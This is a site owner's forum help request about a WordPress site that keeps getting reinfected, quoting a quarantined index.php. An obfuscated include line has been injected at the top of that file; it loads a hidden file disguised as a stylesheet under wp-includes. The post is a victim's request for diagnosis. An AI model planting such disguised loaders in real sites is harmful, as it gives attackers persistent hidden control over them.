Almost as fast as i scan and remove the infection from the site, i go back a few hours later and its infected again. I’m not sure what to do now. I have changed all passwords and also moved the site to a new server, just in case it helped.
https://lloydsblinds.co.uk/
Any help will be much appreciated.
Here is an example of the quarantined of index.php which keeps getting infected (there are others).
<?php
/*aaa76*/
$rk = “/\x75sr/www/\x75sers/lloydsw/wp\x2dincl\x75des/blocks/post\x2dterms/.3460fed5.css”; if (!isset($rk)) {var_dump ($rk);} else { @include_once /* 43 */ ($rk); }
/*aaa76*/
/**
* Front to the WordPress application. This file doesn’t do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( ‘WP_USE_THEMES’, true );
/** Loads the WordPress Environment and Template */
require __DIR__ . ‘/wp-blog-header.php’;
